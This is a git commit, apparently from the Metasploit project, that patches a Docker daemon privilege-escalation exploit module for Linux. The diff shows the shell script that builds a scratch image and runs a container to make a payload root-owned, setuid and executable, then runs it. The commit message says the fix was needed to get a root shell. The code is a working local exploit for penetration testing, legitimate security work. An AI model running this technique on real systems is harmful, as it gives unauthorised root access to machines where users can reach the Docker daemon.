Fix permissions in docker priv_esc module

jbarnett-r7 · jbarnett-r7 · commit 7e9d0b3e9b6b · 2017-09-07T16:48:02.000-05:00
The previous command didn't give the original user enough permissions to execute the payload. This was resulting in permission denied and preventing me from getting a root shell. Fixes rapid7#8937
diff --git a/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb b/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
@@ -64,7 +64,7 @@ def shell_script(exploit_path)
 
     %Q{
       IMG=`(echo "FROM scratch"; echo "CMD a") | docker build -q - | awk "END { print \\\\$NF }"`
-      EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}"
+      EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}; chmod +x #{exploit_path}"
       docker run #{dep_options} $IMG /bin/sh -c "$EXPLOIT"
       docker rmi -f $IMG
       #{exploit_path}
